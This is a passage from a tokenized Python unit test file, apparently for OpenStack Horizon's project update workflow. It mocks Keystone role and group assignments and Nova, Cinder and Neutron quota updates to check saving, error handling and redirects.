<EOL> '<STR_LIT>' ) , <EOL> quotas : ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) } ) <EOL> def test_update_project_get ( self ) : <EOL> keystone_api_version = api . keystone . VERSIONS . 
active <EOL> project = self . tenants . first ( ) <EOL> quota = self . quotas . first ( ) <EOL> default_role = self . roles . first ( ) <EOL> domain_id = project . domain_id <EOL> users = self . _get_all_users ( domain_id ) <EOL> groups = self . _get_all_groups ( domain_id ) <EOL> roles = self . roles . list ( ) <EOL> proj_users = self . _get_proj_users ( project . id ) <EOL> role_assignments = self . _get_proj_role_assignment ( project . id ) <EOL> api . keystone . tenant_get ( IsA ( http . HttpRequest ) , <EOL> self . tenant . id , admin = True ) . AndReturn ( project ) <EOL> api . keystone . domain_get ( IsA ( http . HttpRequest ) , domain_id ) . AndReturn ( self . domain ) <EOL> quotas . get_disabled_quotas ( IsA ( http . HttpRequest ) ) . AndReturn ( self . disabled_quotas . first ( ) ) <EOL> quotas . get_tenant_quota_data ( IsA ( http . HttpRequest ) , <EOL> tenant_id = self . tenant . id ) . AndReturn ( quota ) <EOL> api . keystone . get_default_role ( IsA ( http . HttpRequest ) ) . MultipleTimes ( ) . AndReturn ( default_role ) <EOL> api . keystone . user_list ( IsA ( http . HttpRequest ) , domain = domain_id ) . AndReturn ( users ) <EOL> api . keystone . role_list ( IsA ( http . HttpRequest ) ) . MultipleTimes ( ) . AndReturn ( roles ) <EOL> api . keystone . group_list ( IsA ( http . HttpRequest ) , domain = domain_id ) . AndReturn ( groups ) <EOL> if keystone_api_version >= <NUM_LIT:3> : <EOL> api . keystone . role_assignments_list ( IsA ( http . HttpRequest ) , <EOL> project = self . tenant . id ) . AndReturn ( role_assignments ) <EOL> else : <EOL> api . keystone . user_list ( IsA ( http . HttpRequest ) , <EOL> project = self . tenant . id ) . AndReturn ( proj_users ) <EOL> for user in proj_users : <EOL> api . keystone . roles_for_user ( IsA ( http . HttpRequest ) , <EOL> user . id , <EOL> self . tenant . id ) . AndReturn ( roles ) <EOL> api . keystone . role_assignments_list ( IsA ( http . HttpRequest ) , <EOL> project = self . tenant . id ) . 
AndReturn ( role_assignments ) <EOL> self . mox . ReplayAll ( ) <EOL> url = reverse ( '<STR_LIT>' , <EOL> args = [ self . tenant . id ] ) <EOL> res = self . client . get ( url ) <EOL> self . assertTemplateUsed ( res , views . WorkflowView . template_name ) <EOL> workflow = res . context [ '<STR_LIT>' ] <EOL> self . assertEqual ( res . context [ '<STR_LIT>' ] . name , <EOL> workflows . UpdateProject . name ) <EOL> step = workflow . get_step ( "<STR_LIT>" ) <EOL> self . assertEqual ( step . action . initial [ '<STR_LIT>' ] , quota . get ( '<STR_LIT>' ) . limit ) <EOL> self . assertEqual ( step . action . initial [ '<STR_LIT>' ] , <EOL> quota . get ( '<STR_LIT>' ) . limit ) <EOL> self . assertEqual ( step . action . initial [ '<STR_LIT:name>' ] , project . name ) <EOL> self . assertEqual ( step . action . initial [ '<STR_LIT:description>' ] , <EOL> project . description ) <EOL> self . assertQuerysetEqual ( <EOL> workflow . steps , <EOL> [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) <EOL> @ test . create_stubs ( { api . keystone : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> api . nova : ( '<STR_LIT>' , ) , <EOL> api . cinder : ( '<STR_LIT>' , ) , <EOL> quotas : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) } ) <EOL> def test_update_project_save ( self , neutron = False ) : <EOL> keystone_api_version = api . keystone . VERSIONS . active <EOL> project = self . tenants . first ( ) <EOL> quota = self . quotas . first ( ) <EOL> default_role = self . roles . first ( ) <EOL> domain_id = project . domain_id <EOL> users = self . _get_all_users ( domain_id ) <EOL> proj_users = self . _get_proj_users ( project . id ) <EOL> groups = self . _get_all_groups ( domain_id ) <EOL> proj_groups = self . 
_get_proj_groups ( project . id ) <EOL> roles = self . roles . list ( ) <EOL> role_assignments = self . _get_proj_role_assignment ( project . id ) <EOL> quota_usages = self . quota_usages . first ( ) <EOL> api . keystone . tenant_get ( IsA ( http . HttpRequest ) , <EOL> self . tenant . id , admin = True ) . AndReturn ( project ) <EOL> api . keystone . domain_get ( IsA ( http . HttpRequest ) , domain_id ) . AndReturn ( self . domain ) <EOL> quotas . get_disabled_quotas ( IsA ( http . HttpRequest ) ) . AndReturn ( self . disabled_quotas . first ( ) ) <EOL> if neutron : <EOL> quotas . get_disabled_quotas ( IsA ( http . HttpRequest ) ) . AndReturn ( self . disabled_quotas . first ( ) ) <EOL> quotas . get_tenant_quota_data ( IsA ( http . HttpRequest ) , <EOL> tenant_id = self . tenant . id ) . AndReturn ( quota ) <EOL> api . keystone . get_default_role ( IsA ( http . HttpRequest ) ) . MultipleTimes ( ) . AndReturn ( default_role ) <EOL> api . keystone . user_list ( IsA ( http . HttpRequest ) , domain = domain_id ) . AndReturn ( users ) <EOL> api . keystone . role_list ( IsA ( http . HttpRequest ) ) . MultipleTimes ( ) . AndReturn ( roles ) <EOL> api . keystone . group_list ( IsA ( http . HttpRequest ) , domain = domain_id ) . AndReturn ( groups ) <EOL> workflow_data = { } <EOL> if keystone_api_version >= <NUM_LIT:3> : <EOL> api . keystone . role_assignments_list ( IsA ( http . HttpRequest ) , <EOL> project = self . tenant . id ) . AndReturn ( role_assignments ) <EOL> else : <EOL> api . keystone . user_list ( IsA ( http . HttpRequest ) , <EOL> project = self . tenant . id ) . AndReturn ( proj_users ) <EOL> for user in proj_users : <EOL> api . keystone . roles_for_user ( IsA ( http . HttpRequest ) , <EOL> user . id , <EOL> self . tenant . id ) . AndReturn ( roles ) <EOL> api . keystone . role_assignments_list ( IsA ( http . HttpRequest ) , <EOL> project = self . tenant . id ) . 
AndReturn ( role_assignments ) <EOL> workflow_data [ USER_ROLE_PREFIX + "<STR_LIT:1>" ] = [ '<STR_LIT:3>' ] <EOL> workflow_data [ USER_ROLE_PREFIX + "<STR_LIT:2>" ] = [ '<STR_LIT:2>' ] <EOL> workflow_data [ GROUP_ROLE_PREFIX + "<STR_LIT:1>" ] = [ '<STR_LIT:3>' ] <EOL> workflow_data [ GROUP_ROLE_PREFIX + "<STR_LIT:2>" ] = [ '<STR_LIT:2>' ] <EOL> project . _info [ "<STR_LIT>" ] = domain_id <EOL> project . _info [ "<STR_LIT:name>" ] = "<STR_LIT>" <EOL> project . _info [ "<STR_LIT:description>" ] = "<STR_LIT>" <EOL> quota . metadata_items = <NUM_LIT> <EOL> quota . volumes = <NUM_LIT> <EOL> updated_project = { "<STR_LIT:name>" : project . _info [ "<STR_LIT:name>" ] , <EOL> "<STR_LIT:description>" : project . _info [ "<STR_LIT:description>" ] , <EOL> "<STR_LIT>" : project . enabled } <EOL> updated_quota = self . _get_quota_info ( quota ) <EOL> api . keystone . tenant_update ( IsA ( http . HttpRequest ) , <EOL> project . id , <EOL> ** updated_project ) . AndReturn ( project ) <EOL> api . keystone . user_list ( IsA ( http . HttpRequest ) , <EOL> project = self . tenant . id ) . AndReturn ( proj_users ) <EOL> api . keystone . roles_for_user ( IsA ( http . HttpRequest ) , '<STR_LIT:1>' , <EOL> self . tenant . id ) . AndReturn ( roles ) <EOL> api . keystone . roles_for_user ( IsA ( http . HttpRequest ) , '<STR_LIT:2>' , <EOL> self . tenant . id ) . AndReturn ( ( roles [ <NUM_LIT:0> ] , ) ) <EOL> api . keystone . remove_tenant_user_role ( IsA ( http . HttpRequest ) , <EOL> project = self . tenant . id , <EOL> user = '<STR_LIT:2>' , <EOL> role = '<STR_LIT:1>' ) <EOL> api . keystone . add_tenant_user_role ( IsA ( http . HttpRequest ) , <EOL> project = self . tenant . id , <EOL> user = '<STR_LIT:2>' , <EOL> role = '<STR_LIT:2>' ) <EOL> api . keystone . roles_for_user ( IsA ( http . HttpRequest ) , '<STR_LIT:3>' , <EOL> self . tenant . id ) . AndReturn ( ( roles [ <NUM_LIT:1> ] , ) ) <EOL> api . keystone . remove_tenant_user_role ( IsA ( http . 
HttpRequest ) , <EOL> project = self . tenant . id , <EOL> user = '<STR_LIT:3>' , <EOL> role = '<STR_LIT:2>' ) <EOL> api . keystone . add_tenant_user_role ( IsA ( http . HttpRequest ) , <EOL> project = self . tenant . id , <EOL> user = '<STR_LIT:3>' , <EOL> role = '<STR_LIT:1>' ) <EOL> api . keystone . group_list ( IsA ( http . HttpRequest ) , <EOL> domain = domain_id , <EOL> project = self . tenant . id ) . AndReturn ( proj_groups ) <EOL> api . keystone . roles_for_group ( IsA ( http . HttpRequest ) , <EOL> group = '<STR_LIT:1>' , <EOL> project = self . tenant . id ) . AndReturn ( roles ) <EOL> for role in roles : <EOL> api . keystone . remove_group_role ( IsA ( http . HttpRequest ) , <EOL> role = role . id , <EOL> group = '<STR_LIT:1>' , <EOL> project = self . tenant . id ) <EOL> api . keystone . roles_for_group ( IsA ( http . HttpRequest ) , <EOL> group = '<STR_LIT:2>' , <EOL> project = self . tenant . id ) . AndReturn ( ( roles [ <NUM_LIT:0> ] , ) ) <EOL> api . keystone . remove_group_role ( IsA ( http . HttpRequest ) , <EOL> role = '<STR_LIT:1>' , <EOL> group = '<STR_LIT:2>' , <EOL> project = self . tenant . id ) <EOL> api . keystone . add_group_role ( IsA ( http . HttpRequest ) , <EOL> role = '<STR_LIT:2>' , <EOL> group = '<STR_LIT:2>' , <EOL> project = self . tenant . id ) <EOL> api . keystone . roles_for_group ( IsA ( http . HttpRequest ) , <EOL> group = '<STR_LIT:3>' , <EOL> project = self . tenant . id ) . AndReturn ( ( roles [ <NUM_LIT:1> ] , ) ) <EOL> api . keystone . remove_group_role ( IsA ( http . HttpRequest ) , <EOL> role = '<STR_LIT:2>' , <EOL> group = '<STR_LIT:3>' , <EOL> project = self . tenant . id ) <EOL> api . keystone . add_group_role ( IsA ( http . HttpRequest ) , <EOL> role = '<STR_LIT:1>' , <EOL> group = '<STR_LIT:3>' , <EOL> project = self . tenant . id ) <EOL> quotas . tenant_quota_usages ( IsA ( http . HttpRequest ) , tenant_id = project . id ) . 
AndReturn ( quota_usages ) <EOL> nova_updated_quota = dict ( [ ( key , updated_quota [ key ] ) for key in <EOL> quotas . NOVA_QUOTA_FIELDS ] ) <EOL> api . nova . tenant_quota_update ( IsA ( http . HttpRequest ) , <EOL> project . id , <EOL> ** nova_updated_quota ) <EOL> cinder_updated_quota = dict ( [ ( key , updated_quota [ key ] ) for key in <EOL> quotas . CINDER_QUOTA_FIELDS ] ) <EOL> api . cinder . tenant_quota_update ( IsA ( http . HttpRequest ) , <EOL> project . id , <EOL> ** cinder_updated_quota ) <EOL> self . mox . ReplayAll ( ) <EOL> project_data = { "<STR_LIT>" : project . _info [ "<STR_LIT>" ] , <EOL> "<STR_LIT:name>" : project . _info [ "<STR_LIT:name>" ] , <EOL> "<STR_LIT:id>" : project . id , <EOL> "<STR_LIT:description>" : project . _info [ "<STR_LIT:description>" ] , <EOL> "<STR_LIT>" : project . enabled } <EOL> workflow_data . update ( project_data ) <EOL> workflow_data . update ( updated_quota ) <EOL> url = reverse ( '<STR_LIT>' , <EOL> args = [ self . tenant . id ] ) <EOL> res = self . client . post ( url , workflow_data ) <EOL> self . assertNoFormErrors ( res ) <EOL> self . assertMessageCount ( error = <NUM_LIT:0> , warning = <NUM_LIT:1> ) <EOL> self . assertRedirectsNoFollow ( res , INDEX_URL ) <EOL> @ test . create_stubs ( { api . neutron : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) } ) <EOL> @ test . update_settings ( OPENSTACK_NEUTRON_NETWORK = { '<STR_LIT>' : True } ) <EOL> def test_update_project_save_with_neutron ( self ) : <EOL> quota_data = self . neutron_quotas . first ( ) <EOL> neutron_updated_quota = dict ( [ ( key , quota_data . get ( key ) . limit ) <EOL> for key in quotas . NEUTRON_QUOTA_FIELDS ] ) <EOL> api . neutron . is_extension_supported ( IsA ( http . HttpRequest ) , '<STR_LIT>' ) . MultipleTimes ( ) . AndReturn ( True ) <EOL> api . neutron . tenant_quota_get ( IsA ( http . HttpRequest ) , <EOL> tenant_id = self . tenant . id ) . AndReturn ( quota_data ) <EOL> api . neutron . tenant_quota_update ( IsA ( http . 
HttpRequest ) , <EOL> self . tenant . id , <EOL> ** neutron_updated_quota ) <EOL> self . test_update_project_save ( neutron = True ) <EOL> @ test . create_stubs ( { api . keystone : ( '<STR_LIT>' , ) } ) <EOL> def test_update_project_get_error ( self ) : <EOL> api . keystone . tenant_get ( IsA ( http . HttpRequest ) , self . tenant . id , <EOL> admin = True ) . AndRaise ( self . exceptions . nova ) <EOL> self . mox . ReplayAll ( ) <EOL> url = reverse ( '<STR_LIT>' , <EOL> args = [ self . tenant . id ] ) <EOL> res = self . client . get ( url ) <EOL> self . assertRedirectsNoFollow ( res , INDEX_URL ) <EOL> @ test . create_stubs ( { api . keystone : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> quotas : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , ) , <EOL> api . nova : ( '<STR_LIT>' , ) } ) <EOL> def test_update_project_tenant_update_error ( self ) : <EOL> keystone_api_version = api . keystone . VERSIONS . active <EOL> project = self . tenants . first ( ) <EOL> quota = self . quotas . first ( ) <EOL> default_role = self . roles . first ( ) <EOL> domain_id = project . domain_id <EOL> users = self . _get_all_users ( domain_id ) <EOL> groups = self . _get_all_groups ( domain_id ) <EOL> roles = self . roles . list ( ) <EOL> proj_users = self . _get_proj_users ( project . id ) <EOL> role_assignments = self . role_assignments . list ( ) <EOL> quota_usages = self . quota_usages . first ( ) <EOL> api . keystone . tenant_get ( IsA ( http . HttpRequest ) , self . tenant . id , <EOL> admin = True ) . AndReturn ( project ) <EOL> api . keystone . domain_get ( IsA ( http . HttpRequest ) , domain_id ) . AndReturn ( self . domain ) <EOL> quotas . get_disabled_quotas ( IsA ( http . HttpRequest ) ) . AndReturn ( self . disabled_quotas . 
first ( ) ) <EOL> quotas . get_tenant_quota_data ( IsA ( http . HttpRequest ) , <EOL> tenant_id = self . tenant . id ) . AndReturn ( quota ) <EOL> api . keystone . get_default_role ( IsA ( http . HttpRequest ) ) . MultipleTimes ( ) . AndReturn ( default_role ) <EOL> api . keystone . user_list ( IsA ( http . HttpRequest ) , domain = domain_id ) . AndReturn ( users ) <EOL> api . keystone . role_list ( IsA ( http . HttpRequest ) ) . MultipleTimes ( ) . AndReturn ( roles ) <EOL> api . keystone . group_list ( IsA ( http . HttpRequest ) , domain = domain_id ) . AndReturn ( groups ) <EOL> workflow_data = { } <EOL> if keystone_api_version >= <NUM_LIT:3> : <EOL> api . keystone . role_assignments_list ( IsA ( http . HttpRequest ) , <EOL> project = self . tenant . id ) . AndReturn ( role_assignments ) <EOL> else : <EOL> api . keystone . user_list ( IsA ( http . HttpRequest ) , <EOL> project = self . tenant . id ) . AndReturn ( proj_users ) <EOL> for user in proj_users : <EOL> api . keystone . roles_for_user ( IsA ( http . HttpRequest ) , <EOL> user . id , <EOL> self . tenant . id ) . AndReturn ( roles ) <EOL> role_ids = [ role . id for role in roles ] <EOL> for user in proj_users : <EOL> if role_ids : <EOL> workflow_data . setdefault ( USER_ROLE_PREFIX + role_ids [ <NUM_LIT:0> ] , [ ] ) . append ( user . id ) <EOL> api . keystone . role_assignments_list ( IsA ( http . HttpRequest ) , <EOL> project = self . tenant . id ) . AndReturn ( role_assignments ) <EOL> role_ids = [ role . id for role in roles ] <EOL> for group in groups : <EOL> if role_ids : <EOL> workflow_data . setdefault ( GROUP_ROLE_PREFIX + role_ids [ <NUM_LIT:0> ] , [ ] ) . append ( group . id ) <EOL> project . _info [ "<STR_LIT>" ] = domain_id <EOL> project . _info [ "<STR_LIT:name>" ] = "<STR_LIT>" <EOL> project . _info [ "<STR_LIT:description>" ] = "<STR_LIT>" <EOL> quota . metadata_items = <NUM_LIT> <EOL> quota . volumes = <NUM_LIT> <EOL> updated_project = { "<STR_LIT:name>" : project . 
_info [ "<STR_LIT:name>" ] , <EOL> "<STR_LIT:description>" : project . _info [ "<STR_LIT:description>" ] , <EOL> "<STR_LIT>" : project . enabled } <EOL> updated_quota = self . _get_quota_info ( quota ) <EOL> quotas . tenant_quota_usages ( IsA ( http . HttpRequest ) , tenant_id = project . id ) . AndReturn ( quota_usages ) <EOL> api . keystone . tenant_update ( IsA ( http . HttpRequest ) , <EOL> project . id , <EOL> ** updated_project ) . AndRaise ( self . exceptions . keystone ) <EOL> self . mox . ReplayAll ( ) <EOL> project_data = { "<STR_LIT>" : project . _info [ "<STR_LIT>" ] , <EOL> "<STR_LIT:name>" : project . _info [ "<STR_LIT:name>" ] , <EOL> "<STR_LIT:id>" : project . id , <EOL> "<STR_LIT:description>" : project . _info [ "<STR_LIT:description>" ] , <EOL> "<STR_LIT>" : project . enabled } <EOL> workflow_data . update ( project_data ) <EOL> workflow_data . update ( updated_quota ) <EOL> url = reverse ( '<STR_LIT>' , <EOL> args = [ self . tenant . id ] ) <EOL> res = self . client . post ( url , workflow_data ) <EOL> self . assertNoFormErrors ( res ) <EOL> self . assertRedirectsNoFollow ( res , INDEX_URL ) <EOL> @ test . create_stubs ( { api . keystone : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> quotas : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , ) , <EOL> api . nova : ( '<STR_LIT>' , ) } ) <EOL> def test_update_project_quota_update_error ( self ) : <EOL> keystone_api_version = api . keystone . VERSIONS . active <EOL> project = self . tenants . first ( ) <EOL> quota = self . quotas . first ( ) <EOL> default_role = self . roles . first ( ) <EOL> domain_id = project . domain_id <EOL> users = self . _get_all_users ( domain_id ) <EOL> proj_users = self . _get_proj_users ( project . id ) <EOL> groups = self . 
_get_all_groups ( domain_id ) <EOL> proj_groups = self . _get_proj_groups ( project . id ) <EOL> roles = self . roles . list ( ) <EOL> role_assignments = self . _get_proj_role_assignment ( project . id ) <EOL> quota_usages = self . quota_usages . first ( ) <EOL> api . keystone . tenant_get ( IsA ( http . HttpRequest ) , self . tenant . id , <EOL> admin = True ) . AndReturn ( project ) <EOL> api . keystone . domain_get ( IsA ( http . HttpRequest ) , domain_id ) . AndReturn ( self . domain ) <EOL> quotas . get_disabled_quotas ( IsA ( http . HttpRequest ) ) . AndReturn ( self . disabled_quotas . first ( ) ) <EOL> quotas . get_tenant_quota_data ( IsA ( http . HttpRequest ) , <EOL> tenant_id = self . tenant . id ) . AndReturn ( quota ) <EOL> api . keystone . get_default_role ( IsA ( http . HttpRequest ) ) . MultipleTimes ( ) . AndReturn ( default_role ) <EOL> api . keystone . user_list ( IsA ( http . HttpRequest ) , domain = domain_id ) . AndReturn ( users ) <EOL> api . keystone . role_list ( IsA ( http . HttpRequest ) ) . MultipleTimes ( ) . AndReturn ( roles ) <EOL> api . keystone . group_list ( IsA ( http . HttpRequest ) , domain = domain_id ) . AndReturn ( groups ) <EOL> workflow_data = { } <EOL> if keystone_api_version >= <NUM_LIT:3> : <EOL> api . keystone . role_assignments_list ( IsA ( http . HttpRequest ) , <EOL> project = self . tenant . id ) . AndReturn ( role_assignments ) <EOL> else : <EOL> api . keystone . user_list ( IsA ( http . HttpRequest ) , <EOL> project = self . tenant . id ) . AndReturn ( proj_users ) <EOL> for user in proj_users : <EOL> api . keystone . roles_for_user ( IsA ( http . HttpRequest ) , <EOL> user . id , <EOL> self . tenant . id ) . AndReturn ( roles ) <EOL> api . keystone . role_assignments_list ( IsA ( http . HttpRequest ) , <EOL> project = self . tenant . id ) . 
AndReturn ( role_assignments ) <EOL> workflow_data [ USER_ROLE_PREFIX + "<STR_LIT:1>" ] = [ '<STR_LIT:1>' , '<STR_LIT:3>' ] <EOL> workflow_data [ USER_ROLE_PREFIX + "<STR_LIT:2>" ] = [ '<STR_LIT:1>' , '<STR_LIT:2>' , '<STR_LIT:3>' ] <EOL> workflow_data [ GROUP_ROLE_PREFIX + "<STR_LIT:1>" ] = [ '<STR_LIT:1>' , '<STR_LIT:3>' ] <EOL> workflow_data [ GROUP_ROLE_PREFIX + "<STR_LIT:2>" ] = [ '<STR_LIT:1>' , '<STR_LIT:2>' , '<STR_LIT:3>' ] <EOL> project . _info [ "<STR_LIT>" ] = domain_id <EOL> project . _info [ "<STR_LIT:name>" ] = "<STR_LIT>" <EOL> project . _info [ "<STR_LIT:description>" ] = "<STR_LIT>" <EOL> quota [ <NUM_LIT:0> ] . limit = <NUM_LIT> <EOL> quota [ <NUM_LIT:1> ] . limit = - <NUM_LIT:1> <EOL> updated_project = { "<STR_LIT:name>" : project . _info [ "<STR_LIT:name>" ] , <EOL> "<STR_LIT:description>" : project . _info [ "<STR_LIT:description>" ] , <EOL> "<STR_LIT>" : project . enabled } <EOL> updated_quota = self . _get_quota_info ( quota ) <EOL> api . keystone . tenant_update ( IsA ( http . HttpRequest ) , <EOL> project . id , <EOL> ** updated_project ) . AndReturn ( project ) <EOL> api . keystone . user_list ( IsA ( http . HttpRequest ) , <EOL> project = self . tenant . id ) . AndReturn ( proj_users ) <EOL> api . keystone . roles_for_user ( IsA ( http . HttpRequest ) , '<STR_LIT:1>' , <EOL> self . tenant . id ) . AndReturn ( roles ) <EOL> api . keystone . roles_for_user ( IsA ( http . HttpRequest ) , '<STR_LIT:2>' , <EOL> self . tenant . id ) . AndReturn ( ( roles [ <NUM_LIT:1> ] , ) ) <EOL> api . keystone . roles_for_user ( IsA ( http . HttpRequest ) , '<STR_LIT:3>' , <EOL> self . tenant . id ) . AndReturn ( ( roles [ <NUM_LIT:0> ] , ) ) <EOL> api . keystone . add_tenant_user_role ( IsA ( http . HttpRequest ) , <EOL> project = self . tenant . id , <EOL> user = '<STR_LIT:3>' , <EOL> role = '<STR_LIT:2>' ) <EOL> api . keystone . group_list ( IsA ( http . HttpRequest ) , <EOL> domain = domain_id , <EOL> project = self . tenant . id ) . 
AndReturn ( proj_groups ) <EOL> api . keystone . roles_for_group ( IsA ( http . HttpRequest ) , <EOL> group = '<STR_LIT:1>' , <EOL> project = self . tenant . id ) . AndReturn ( roles ) <EOL> api . keystone . roles_for_group ( IsA ( http . HttpRequest ) , <EOL> group = '<STR_LIT:2>' , <EOL> project = self . tenant . id ) . AndReturn ( ( roles [ <NUM_LIT:1> ] , ) ) <EOL> api . keystone . roles_for_group ( IsA ( http . HttpRequest ) , <EOL> group = '<STR_LIT:3>' , <EOL> project = self . tenant . id ) . AndReturn ( ( roles [ <NUM_LIT:0> ] , ) ) <EOL> api . keystone . add_group_role ( IsA ( http . HttpRequest ) , <EOL> role = '<STR_LIT:2>' , <EOL> group = '<STR_LIT:3>' , <EOL> project = self . tenant . id ) <EOL> quotas . tenant_quota_usages ( IsA ( http . HttpRequest ) , tenant_id = project . id ) . AndReturn ( quota_usages ) <EOL> nova_updated_quota = dict ( [ ( key , updated_quota [ key ] ) for key in <EOL> quotas . NOVA_QUOTA_FIELDS ] ) <EOL> api . nova . tenant_quota_update ( IsA ( http . HttpRequest ) , <EOL> project . id , <EOL> ** nova_updated_quota ) . AndRaise ( self . exceptions . nova ) <EOL> self . mox . ReplayAll ( ) <EOL> project_data = { "<STR_LIT>" : project . _info [ "<STR_LIT>" ] , <EOL> "<STR_LIT:name>" : project . _info [ "<STR_LIT:name>" ] , <EOL> "<STR_LIT:id>" : project . id , <EOL> "<STR_LIT:description>" : project . _info [ "<STR_LIT:description>" ] , <EOL> "<STR_LIT>" : project . enabled } <EOL> workflow_data . update ( project_data ) <EOL> workflow_data . update ( updated_quota ) <EOL> url = reverse ( '<STR_LIT>' , <EOL> args = [ self . tenant . id ] ) <EOL> res = self . client . post ( url , workflow_data ) <EOL> self . assertNoFormErrors ( res ) <EOL> self . assertMessageCount ( error = <NUM_LIT:2> , warning = <NUM_LIT:0> ) <EOL> self . assertRedirectsNoFollow ( res , INDEX_URL ) <EOL> @ test . create_stubs ( { api . 
keystone : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> quotas : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) } ) <EOL> def test_update_project_member_update_error ( self ) : <EOL> keystone_api_version = api . keystone . VERSIONS . active <EOL> project = self . tenants . first ( ) <EOL> quota = self . quotas . first ( ) <EOL> default_role = self . roles . first ( ) <EOL> domain_id = project . domain_id <EOL> users = self . _get_all_users ( domain_id ) <EOL> proj_users = self . _get_proj_users ( project . id ) <EOL> groups = self . _get_all_groups ( domain_id ) <EOL> roles = self . roles . list ( ) <EOL> role_assignments = self . _get_proj_role_assignment ( project . id ) <EOL> quota_usages = self . quota_usages . first ( ) <EOL> api . keystone . tenant_get ( IsA ( http . HttpRequest ) , self . tenant . id , <EOL> admin = True ) . AndReturn ( project ) <EOL> api . keystone . domain_get ( IsA ( http . HttpRequest ) , domain_id ) . AndReturn ( self . domain ) <EOL> quotas . get_disabled_quotas ( IsA ( http . HttpRequest ) ) . AndReturn ( self . disabled_quotas . first ( ) ) <EOL> quotas . get_tenant_quota_data ( IsA ( http . HttpRequest ) , <EOL> tenant_id = self . tenant . id ) . AndReturn ( quota ) <EOL> api . keystone . get_default_role ( IsA ( http . HttpRequest ) ) . MultipleTimes ( ) . AndReturn ( default_role ) <EOL> api . keystone . user_list ( IsA ( http . HttpRequest ) , domain = domain_id ) . AndReturn ( users ) <EOL> api . keystone . role_list ( IsA ( http . HttpRequest ) ) . MultipleTimes ( ) . AndReturn ( roles ) <EOL> api . keystone . group_list ( IsA ( http . HttpRequest ) , domain = domain_id ) . AndReturn ( groups ) <EOL> workflow_data = { } <EOL> if keystone_api_version >= <NUM_LIT:3> : <EOL> api . 
keystone . role_assignments_list ( IsA ( http . HttpRequest ) , <EOL> project = self . tenant . id ) . AndReturn ( role_assignments ) <EOL> else : <EOL> api . keystone . user_list ( IsA ( http . HttpRequest ) , <EOL> project = self . tenant . id ) . AndReturn ( proj_users ) <EOL> for user in proj_users : <EOL> api . keystone . roles_for_user ( IsA ( http . HttpRequest ) , <EOL> user . id , <EOL> self . tenant . id ) . AndReturn ( roles ) <EOL> api . keystone . role_assignments_list ( IsA ( http . HttpRequest ) , <EOL> project = self . tenant . id ) . AndReturn ( role_assignments ) <EOL> workflow_data [ USER_ROLE_PREFIX + "<STR_LIT:1>" ] = [ '<STR_LIT:1>' , '<STR_LIT:3>' ] <EOL> workflow_data [ USER_ROLE_PREFIX + "<STR_LIT:2>" ] = [ '<STR_LIT:1>' , '<STR_LIT:2>' , '<STR_LIT:3>' ] <EOL> workflow_data [ GROUP_ROLE_PREFIX + "<STR_LIT:1>" ] = [ '<STR_LIT:1>' , '<STR_LIT:3>' ] <EOL> workflow_data [ GROUP_ROLE_PREFIX + "<STR_LIT:2>" ] = [ '<STR_LIT:1>' , '<STR_LIT:2>' , '<STR_LIT:3>' ] <EOL> project . _info [ "<STR_LIT>" ] = domain_id <EOL> project . _info [ "<STR_LIT:name>" ] = "<STR_LIT>" <EOL> project . _info [ "<STR_LIT:description>" ] = "<STR_LIT>" <EOL> quota . metadata_items = <NUM_LIT> <EOL> quota . volumes = <NUM_LIT> <EOL> updated_project = { "<STR_LIT:name>" : project . _info [ "<STR_LIT:name>" ] , <EOL> "<STR_LIT:description>" : project . _info [ "<STR_LIT:description>" ] , <EOL> "<STR_LIT>" : project . enabled } <EOL> updated_quota = self . _get_quota_info ( quota ) <EOL> quotas . tenant_quota_usages ( IsA ( http . HttpRequest ) , tenant_id = project . id ) . AndReturn ( quota_usages ) <EOL> api . keystone . tenant_update ( IsA ( http . HttpRequest ) , <EOL> project . id , <EOL> ** updated_project ) . AndReturn ( project ) <EOL> api . keystone . user_list ( IsA ( http . HttpRequest ) , <EOL> project = self . tenant . id ) . AndReturn ( proj_users ) <EOL> api . keystone . roles_for_user ( IsA ( http . HttpRequest ) , '<STR_LIT:1>' , <EOL> self . tenant . 
